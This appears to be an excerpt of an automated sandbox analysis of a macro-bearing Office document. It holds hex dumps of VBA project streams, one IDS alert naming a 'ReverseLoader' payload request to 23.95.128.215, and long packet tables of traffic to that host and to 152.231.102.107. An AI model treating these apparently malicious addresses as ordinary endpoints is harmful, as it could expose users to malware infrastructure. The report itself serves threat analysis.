                                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:553
                                                                      Entropy:6.370920844802575
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . f > X i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 66 3e 58 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                      2024-11-27T17:56:25.440158+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49174 | 23.95.128.215 | 80 | TCP
                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Nov 27, 2024 17:56:01.654218912 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.654314995 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.654367924 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.658202887 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.658257961 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.658786058 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.658843994 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.662142992 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.662198067 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.662259102 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.662309885 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.666081905 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.666136026 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.666280985 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.666332960 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.692426920 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.692481041 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.692583084 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.692625046 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.776384115 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.776479006 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.776665926 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.776717901 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.778359890 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.778419971 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.778901100 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.778950930 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.781379938 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.781431913 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.781467915 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.781511068 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.785327911 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.785378933 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.786133051 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.786183119 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.789468050 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.789521933 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.789552927 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.789604902 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.793288946 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.793343067 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.793450117 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.793498039 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.797359943 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.797416925 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.798190117 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.798243999 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.801456928 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.801507950 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.802892923 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.802944899 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.805357933 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.805408955 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.805430889 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.805479050 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.809246063 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.809298038 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.809614897 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.809664965 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.813199997 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.813254118 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.813962936 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.814018965 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.817137957 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.817193985 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.817225933 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.817270041 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.821126938 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.821198940 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.821757078 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.821815014 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.825119019 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.825170040 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.826196909 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.826251030 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.827064991 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.827111959 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.827117920 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.827153921 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.828893900 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.828948021 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.829220057 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.829272032 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.830756903 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.830806017 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.831326008 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.831419945 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.832703114 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.832775116 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.834644079 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.834660053 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.834691048 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.834711075 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.834719896 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.834748983 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.836441994 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.836496115 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.837543011 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.837594986 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.838351011 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.838402033 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.838429928 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.838476896 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.840202093 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.840254068 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.840761900 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.840814114 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.842114925 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.842166901 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.842689037 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.842737913 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.844010115 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.844060898 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.844182968 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.844242096 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.846580029 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.846649885 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.847327948 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.847383022 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.847784042 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.847798109 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.847847939 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.849558115 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.849617004 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.849800110 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.849859953 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.896595001 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.896658897 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.896670103 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.896711111 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.898413897 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.898471117 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.898849964 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.898902893 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.901499033 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.901551962 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.902671099 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.902724028 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.905483007 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.905539036 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.905827999 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.905886889 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.909596920 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.909643888 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.909648895 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.909687042 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.913475990 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.913532019 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.914616108 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.914668083 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.918047905 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.918103933 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.918921947 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.919006109 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.921552896 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.921603918 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.921679020 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.921725035 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.925640106 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.925693035 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.926475048 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.926522017 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.938508034 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.938556910 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.938760042 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.938807011 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.939308882 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.939353943 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.939429045 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.939486980 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.941178083 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.941226959 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.941714048 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.941761971 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.943002939 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.943067074 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.986926079 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.986982107 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.987204075 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.987282991 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.987759113 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.987782955 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.987807035 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.987818003 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.989634991 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.989675999 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.990231991 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.990279913 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.991540909 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.991590977 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.991611004 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.991667986 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.993386984 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.993441105 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.994641066 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.994692087 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.995356083 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.995409012 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.995510101 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.995560884 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.997234106 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.997284889 CET4916680192.168.2.2223.95.128.215
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 17:56:01.998146057 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:01.998191118 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:01.999051094 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:01.999105930 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:01.999321938 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:01.999372005 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.000909090 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.000962973 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.002517939 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.002590895 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.002832890 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.002847910 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.002888918 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.004882097 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.004934072 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.004964113 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.005011082 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.006622076 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.006670952 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.007071972 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.007122993 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.008470058 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.008517981 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.009274006 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.009330988 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.010358095 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.010404110 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.011414051 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.011468887 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.012223959 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.012264967 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.012757063 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.012809038 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.016787052 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.016838074 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.017503023 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.017515898 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.017556906 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.017580032 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.017625093 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.019318104 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.019370079 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.019525051 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.019573927 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.021742105 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.021791935 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.022300005 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.022351027 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.022428989 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.022485018 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.023276091 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.023330927 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.037147999 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.037208080 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.037370920 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.037417889 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.038814068 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.038872004 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.039139032 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.039184093 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.042041063 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.042093039 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.042104006 CET | 80 | 49166 | 23.95.128.215 | 192.168.2.22
Nov 27, 2024 17:56:02.042151928 CET | 49166 | 80 | 192.168.2.22 | 23.95.128.215
Nov 27, 2024 17:56:02.428491116 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:02.428531885 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:02.428591013 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:02.433497906 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:02.433514118 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:03.981678009 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:03.981753111 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:03.986974001 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:03.986987114 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:03.987391949 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:03.987451077 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.052628994 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.095333099 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:04.612037897 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:04.612118006 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:04.612210035 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.612694979 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.615606070 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.615633965 CET | 443 | 49167 | 152.231.102.107 | 192.168.2.22
Nov 27, 2024 17:56:04.615648985 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:04.615696907 CET | 49167 | 443 | 192.168.2.22 | 152.231.102.107
Nov 27, 2024 17:56:05.284754038 CET | 49168 | 443 | 192.168.2.22 | 152.231.102.107
